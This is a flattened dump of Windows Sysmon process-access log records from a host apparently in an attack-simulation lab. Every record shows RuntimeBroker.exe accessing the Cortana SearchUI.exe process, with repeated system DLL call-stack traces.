12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000007572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.026{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 